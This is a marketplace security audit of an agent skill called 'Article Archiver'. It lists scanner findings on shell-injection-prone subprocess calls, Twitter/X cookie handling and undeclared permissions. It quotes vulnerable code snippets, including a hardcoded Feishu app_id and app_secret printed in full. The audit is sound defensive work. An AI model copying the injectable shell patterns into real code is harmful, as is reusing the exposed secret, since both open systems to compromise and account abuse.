ClawHub
Back to skill

Security audit

Article Archiver

Security checks across malware telemetry and agentic risk

Overview

This archiver mostly does what it says, but it automatically sends shared content to fixed Feishu resources while bundling sensitive credentials and unsafe shell-based helpers.

Review before installing. Replace and rotate all bundled Feishu and Twitter/X credentials, confirm the Feishu destination and notification recipient, require explicit confirmation before archiving shared links, and fix shell-command construction before using this on untrusted URLs or article content.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Behavioral ASTexec() Call, eval() Call, Dynamic Import
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
Findings (69)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
-d '{{"obj_type":"docx","parent_node_token":"{parent_token}","node_type":"origin","title":"{title}"}}'
'''
    
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    if result.returncode != 0:
        raise Exception(f"Failed to create node: {result.stderr}")
Confidence
99% confidence
Finding
result = subprocess.run(cmd, shell=True, capture_output=True, text=True)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
def run_cmd(cmd):
    """执行命令并返回输出"""
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.returncode, result.stdout, result.stderr

def get_access_token():
Confidence
98% confidence
Finding
result = subprocess.run(cmd, shell=True, capture_output=True, text=True)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
-d '{"app_id":"cli_a90ecd03bc399bcb","app_secret":"gdEsio0WzDtHEhHFeLS55wBseDpExVtg"}' | jq -r '.tenant_access_token'
'''
    
    result = subprocess.run(token_cmd, shell=True, capture_output=True, text=True)
    if result.returncode != 0:
        raise Exception(f"Failed to get token: {result.stderr}")
Confidence
95% confidence
Finding
result = subprocess.run(token_cmd, shell=True, capture_output=True, text=True)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
-d '{{"obj_type":"docx","parent_node_token":"{parent_token}","node_type":"origin","title":"{title_escaped}"}}'
'''
    
    result = subprocess.run(create_cmd, shell=True, capture_output=True, text=True)
    if result.returncode != 0:
        raise Exception(f"Failed to create node: {result.stderr}")
Confidence
99% confidence
Finding
result = subprocess.run(create_cmd, shell=True, capture_output=True, text=True)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
# 调用 CLI
        cmd = f'openclaw feishu-doc upload-image --doc-token "{doc_token}" --file-path "{image_path}"'
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        
        sys.exit(result.returncode)
Confidence
99% confidence
Finding
result = subprocess.run(cmd, shell=True, capture_output=True, text=True)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
# 调用 CLI
        cmd = f'openclaw feishu-doc {action} --doc-token "{doc_token}" --content "{content_escaped}"'
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        
        sys.exit(result.returncode)
Confidence
98% confidence
Finding
result = subprocess.run(cmd, shell=True, capture_output=True, text=True)

Lp3

Medium
Category
MCP Least Privilege
Confidence
92% confidence
Finding
The skill clearly uses file reads, shell commands, network access, and writes to external services, yet no permissions are declared. This creates a transparency and policy-enforcement gap: users and the platform cannot accurately assess or constrain what the skill will do before it runs.

Tp4

High
Category
MCP Tool Poisoning
Confidence
88% confidence
Finding
The documented behavior understates the actual scope: the skill performs broader web extraction, Feishu wiki search/creation flows, and outbound notifications beyond the concise description. Behavior-description mismatch is dangerous because it prevents informed consent and can hide sensitive data handling or external side effects from users and reviewers.

Context-Inappropriate Capability

Medium
Confidence
91% confidence
Finding
The skill is designed to read a local Twitter cookie file containing authentication material. Accessing persistent local credentials from a skill increases the risk of credential leakage, misuse of an authenticated session, and unintended access to protected content.

Context-Inappropriate Capability

Medium
Confidence
98% confidence
Finding
The script constructs shell commands with untrusted input and passes them to execSync for both the Twitter fetcher invocation and the curl call. Because the URL and cookie-derived data are interpolated directly into a shell string, an attacker can trigger command injection and arbitrary local command execution, which is far more dangerous than ordinary article archiving.

Context-Inappropriate Capability

Medium
Confidence
95% confidence
Finding
The script executes a shell file from the user's home directory via `source`, which runs arbitrary local shell code with the script's privileges, not merely reads configuration data. In a skill that should only archive shared articles, this expands scope into uncontrolled local code execution and makes behavior dependent on mutable user-local state that could be tampered with.

Context-Inappropriate Capability

High
Confidence
100% confidence
Finding
The script embeds a Feishu app_id and app_secret directly in source and uses them to obtain tenant access tokens. Hardcoded production credentials are highly sensitive: anyone with code access can reuse them to access the Feishu tenant, and in this file they are combined with a shell-based API call that increases compromise risk.

Context-Inappropriate Capability

High
Confidence
99% confidence
Finding
The script embeds a Feishu app ID and app secret directly in source code, which exposes reusable credentials to anyone who can read the skill package or logs. In an agent skill context, this is especially dangerous because the skill is designed to auto-trigger and send content externally, so leaked credentials could be abused to create or modify Feishu documents outside intended workflows.

Context-Inappropriate Capability

Medium
Confidence
90% confidence
Finding
Using shell command execution as the core implementation is not inherently exploitable by itself, but here it materially increases attack surface because the skill routes article-derived data into those commands. The automation triggers immediately on shared URLs, which makes unsafe shell usage more dangerous than in a tightly controlled admin script.

Context-Inappropriate Capability

Medium
Confidence
84% confidence
Finding
The script unconditionally reads a local Twitter cookie file and uses it as an implicit credential source for processing user-supplied URLs. In this skill context, that increases danger because the skill is configured to auto-trigger on shared links without confirmation, so a user can cause credential-backed network access without any transparent consent or clear scope restriction.

Context-Inappropriate Capability

High
Confidence
99% confidence
Finding
Hardcoded Feishu app credentials are embedded directly in the script, exposing secrets to anyone with file access and enabling unauthorized API use. In this skill context, the credentials grant persistent external service access unrelated to any per-user authorization flow, increasing the risk of account abuse and data exposure.

Context-Inappropriate Capability

Medium
Confidence
94% confidence
Finding
Using shell commands with curl and jq for API access adds unnecessary command-execution capability beyond the business need of creating a Feishu document. This increases the blast radius of bugs and makes injection flaws more likely, especially since adjacent code interpolates data into shell commands.

Context-Inappropriate Capability

Medium
Confidence
94% confidence
Finding
The script explicitly requires a raw x.com cookie string as a command-line argument, parses it, and injects it into a Playwright browser context for '.x.com'. This grants the skill the ability to act with a user's authenticated session, which is broader than ordinary article archiving and creates clear risk of credential misuse, leakage via process arguments/logs, and unauthorized access to private account-bound content.

Context-Inappropriate Capability

Medium
Confidence
95% confidence
Finding
The script requires a raw x.com cookie string as a command-line argument, then injects it into a browser context for authenticated access. Command-line secrets are commonly exposed via shell history, process listings, logs, and orchestration tooling, so this creates a real credential-handling risk beyond the stated article-archiving function.

Context-Inappropriate Capability

Medium
Confidence
94% confidence
Finding
The script reads Twitter/X authentication cookies from a local file and injects them into a Playwright browser session, enabling authenticated access using preexisting credentials. Even though this is labeled as a test script, handling session cookies this way creates a credential-use capability beyond simple public article archiving and can lead to unauthorized access, account misuse, or accidental leakage of sensitive session data.

Context-Inappropriate Capability

High
Confidence
95% confidence
Finding
The fallback implementation introduces shell command execution capability even though the skill only needs to upload article images. This expands the attack surface beyond the skill's purpose and allows attacker-controlled arguments to influence command execution, making compromise more likely in an auto-triggered archiving workflow.

Description-Behavior Mismatch

High
Confidence
85% confidence
Finding
The script's behavior does not match the stated article-archiving purpose and instead performs direct document block manipulation by inserting an image into a Feishu doc. In an agent skill that is supposed to act automatically on shared links, undocumented write capabilities increase the risk of unauthorized content modification and make the skill harder for users and reviewers to trust.

Context-Inappropriate Capability

Medium
Confidence
82% confidence
Finding
Reading local image tokens from /tmp and using them to manipulate a remote document is an undeclared capability unrelated to the advertised article-archiving behavior. This creates a path for unintended or opaque data use, especially in an automated skill that users expect to process URLs rather than consume local artifacts.

Missing User Warnings

Medium
Confidence
91% confidence
Finding
The document explicitly references a persistent authentication cookie file (`config/twitter-cookies.txt`) and advises updating it when expired, but provides no warning about the sensitivity of session cookies or the risk of account takeover if they are exposed. In an agent skill that automates browsing and archiving, normalizing cookie-file handling without safeguards increases the chance that operators store, share, or log live credentials insecurely.

Missing User Warnings

Medium
Confidence
89% confidence
Finding
This section describes downloading externally hosted images, creating Feishu documents, and writing article content plus metadata into Feishu, but omits any notice that third-party content and potentially sensitive metadata will be transmitted, stored, and possibly retained outside the original source. Because the skill is configured to trigger automatically on shared URLs without confirmation, this missing disclosure makes unintended data exfiltration and privacy violations more likely.

VirusTotal

63/63 vendors flagged this skill as clean.

View on VirusTotal